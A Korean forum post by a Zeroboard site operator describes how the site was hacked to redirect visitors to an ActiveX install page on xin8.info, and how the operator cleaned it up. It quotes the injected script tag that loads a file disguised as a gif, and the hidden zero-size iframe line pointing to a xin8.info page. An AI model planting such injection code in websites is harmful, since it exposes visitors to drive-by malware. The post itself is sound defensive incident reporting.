저도 제로보드체제의 사이트를 운영하고 있어서,
xin8.info 액티브x설치페이지 강제리디렉션 크래킹에 걸렸습니다.

해당 gif파일의 파일명이 바뀌어서 감염되어 있었습니다. (몇가지중 랜덤으로 걸리는듯하기도 합니다)
제 경우
<script language="javascript" type="text/javascript" src="icon/include.gif"></script>

로 지정되어있었습니다.

그리고 해당 파일을 텍스트 에디터로 열면

document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");

이 삽입되 있네요.

강제로 해당 페이지의 액티브X를 막은 시스템이나 파이어폭스를 사용하시면
글쓰기 직후에 상당한 대기 시간이 생기는데
이때 소스 보기를 하면 저 스크립트가 보입니다.

일단 제가 처리해둔 방법은

_head.php의 코드 삭제
해당 파일(include.gif)를 더미 파일로 교체(빈 텍스트 파일을 이름만 바꾸어서 덮어씌움)


일단은 더이상 정보가 없어 얼추 삭제처리는 해놧는데, 언제 다시 부활할지....짜증납니다.

she fall....